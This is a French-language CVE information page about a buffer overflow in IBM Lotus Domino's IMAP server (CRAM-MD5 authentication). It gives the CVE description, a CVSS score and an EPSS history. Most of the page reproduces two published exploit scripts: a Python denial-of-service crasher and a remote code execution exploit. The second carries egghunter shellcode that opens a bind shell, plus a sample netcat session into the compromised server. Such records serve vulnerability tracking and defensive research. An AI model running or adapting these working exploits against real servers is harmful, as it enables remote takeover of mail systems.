CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Buffer overflow in the CRAM-MD5 authentication mechanism in the IMAP server (nimap.exe) in IBM Lotus Domino before 6.5.6 and 7.x before 7.0.2 FP1 allows remote attackers to cause a denial of service via a long username.
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
7.2%
–
–
2022-02-13
–
–
7.2%
–
–
2022-04-03
–
–
7.2%
–
–
2023-03-12
–
–
–
92.99%
–
2023-04-23
–
–
–
92.99%
–
2023-09-03
–
–
–
93.08%
–
2023-12-24
–
–
–
92.44%
–
2024-02-04
–
–
–
92.68%
–
2024-06-02
–
–
–
92.44%
–
2024-12-22
–
–
–
91.73%
–
2025-01-19
–
–
–
91.73%
–
2025-03-18
–
–
–
–
70.33%
2025-03-30
–
–
–
–
56.71%
2025-04-22
–
–
–
–
50.37%
2025-04-22
–
–
–
–
50.37,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2007-03-28 22h00 +00:00 Auteur : Winny Thomas EDB Vérifié : Yes
#!/usr/bin/python
#
# Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on windows
# 2000 server SP4. The code crashes the IMAP server. Since this is a simple DOS
# where 256+ (but no more than 270) bytes for the username crashes the service
# this is likely to work on other windows platform aswell. Maybe someone can carry this further and come out
# with a code exec exploit.
#
# Author shall bear no reponsibility for any screw ups caused by using this code
# Winny Thomas :-)
#
import sys
import md5
import struct
import base64
import socket
def ExploitLotus(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
print response
auth = 'a001 authenticate cram-md5\r\n'
sock.send(auth)
response = sock.recv(1024)
print response
# prepare digest of the response from server
m = md5.new()
m.update(response[2:0])
digest = m.digest()
payload = 'A' * 256
# the following DWORD is stored in ECX
# at the time of overflow the following call is made
# call dword ptr [ecx]. However i couldnt find suitable conditions under which a stable pointer to our shellcode
# could be used. Actually i have not searched hard enough :-).
payload += struct.pack('<L', 0x58585858)
# Base64 encode the user info to the server
login = payload + ' ' + digest
login = base64.encodestring(login) + '\r\n'
sock.send(login)
response = sock.recv(1024)
print response
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <imap server>\n' % sys.argv[0]
sys.exit(-1)
ExploitLotus(target)
# milw0rm.com [2007-03-29]
Date de publication : 2007-07-19 22h00 +00:00 Auteur : dmc & prdelka EDB Vérifié : Yes
###########################################################################################
# Lotus Domino IMAP4 Server Release 6.5.4 / Windows 2000 Advanced Server x86 Remote Exploit
###########################################################################################
# Vulnerable: IBM Lotus Domino <= 7.0.2 && 6.5.5 FP2 (tested 6.5.4)
# Authors: Dominic Chell <dmc@digitalapocalypse.net> & prdelka
#
# Exploitation steps:
# 1) The instruction "call dword [ecx]" is performed with user supplied ECX
# 2) EAX reference our buffer from retaddr onward
# 3) we put pointer in ECX to a pointer referencing "call eax"
# 4) a small payload decrements eax and then jmp's into the eax buffer due
# to size limitations.
# 5) our larger payload is then executed.
#
# muts exploit would not work for us, his egghunt uses 0x2e which is converted
# to 0x09 (.'s to [tab]'s) and his return address was not found on our test
# environment.
#
# Finding a Target:
# To find a target, attach a debugger to nimap.exe, cause the application
# to crash. Then use search function to find "call eax" or equivilant
# instruction in memory. Then, take the pointer to eax, such as "0x77ff1122"
# and search for another location in memory that has "0x11 0xff 0x77". This
# will be utilised for a return address if no instruction modify eax or
# subvert execution to another place in memory.
#
# Thanks to: nemo, hdm, jf, Winny Thomas, muts
#
###########################################################################################
# Note: it takes a few minutes for the egghunter to find the payload in memory
#
# For example:
# C:\work\exploits\imap>poc.py
# [*] sending payload
# [*] sending payload
# [*] sending payload
# [*] sending payload
# * OK Domino IMAP4 Server Release 6.5.4 ready Tue, 26 Jun 2007 15:18:36 +0100
#
# PDAwNEU5QkNCLjgwMjU3MzA2LjAwMDAwOUY4LjAwMDAwMDA5QERNQz4=
#
# sending...
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkNvS2XQk9FgpybEKu3E1If4xWBcDWBeDmcnDC2rgYnVG+2Q3
# BG5572VAQQov6VasmyGZmqi4dlFEk/x9Zwv0gcDrZXeQkJCD6FKD6FKD6FL/4CB4OcnLXAvHq421
# M2iR5FFG
#
#
# C:\work\exploits\imap>nc -vv 192.168.126.130 4444
# 2KVM-DC [192.168.126.130] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-1999 Microsoft Corp.
#
# E:\Lotus\Domino>
#
###########################################################################################
import socket, struct, md5, base64, sys, string, signal, getopt
class Exp_Lotus:
def __init__(self):
self.host='127.0.0.1'
self.port=143
def send_payload(host,port):
payload ="\x54\x30\x30\x57\x54\x30\x30\x57"
payload += ("\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"
"\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"
"\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"
"\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"
"\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"
"\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"
"\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"
"\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"
"\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"
"\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"
"\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"
"\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"
"\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"
"\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"
"\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"
"\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"
"\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"
"\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"
"\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"
"\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"
"\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"
"\xa4\x7d\x2e\x7f\x27\x82\xf8\x80")
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
d=s.recv(1024)
print "[*] sending payload"
s.send('a001 admin ' + payload + '\r\n')
d=s.recv(1024)
s.close()
except:
"Can't connect to IMAP server"
def usage():
print sys.argv[0] + "\n\n\tLotus Domino 6.5.4 Windows 2000 Advanced Server x86 Exploit\n\tauthor: dmc@digitalapocalypse.net & prdelka"
print "\t-h host"
print "\t-p port"
sys.exit(2)
def signal_handler(signal, frame):
print 'err: caught sigint, exiting'
sys.exit(0)
def exp(host, port):
buffer = "\x90" * 193
buffer += ("\xdb\xd2\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x0a\xbb\x71\x35\x21"
"\xfe\x31\x58\x17\x03\x58\x17\x83\x99\xc9\xc3\x0b\x6a\xe0\x62"
"\x75\x46\xfb\x64\x37\x04\x6e\x79\xef\x65\x40\x41\x0a\x2f\xe9"
"\x56\xac\x9b\x21\x99\x9a\xa8\xb8\x76\x51\x44\x93\xfc\x7d\x67"
"\x0b\xf4\x81")
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
d=s.recv(1024)
print d
s.send('a001 authenticate cram-md5\r\n')
d=s.recv(1024)
d=d[2:1022].strip()
print d
m=md5.new()
m.update(d)
digest = m.digest()
buffer += struct.pack('<L', 0x7765ebc0) # call eax 6014DC6E (ptr to 6014DC68)
buffer += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
buffer = buffer + ' ' + digest
s.send(base64.encodestring(buffer) + '\r\n')
print "\nsending...\n", base64.encodestring(buffer) , '\r\n'
except:
"Can't connect to IMAP server"
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
if not argv:
usage()
try:
opts, args = getopt.getopt(argv, 'h:p:')
except getopt.GetoptError:
usage()
signal.signal(signal.SIGINT, signal_handler)
ex = Exp_Lotus()
for o, a in opts:
if o == '-h': ex.host=a.strip()
elif o =='-p': ex.port = int(a)
host = ex.host
port = ex.port
send_payload(host,port)
send_payload(host,port)
send_payload(host,port)
send_payload(host,port)
exp(host, port)
if __name__ == '__main__':
main()
# milw0rm.com [2007-07-20]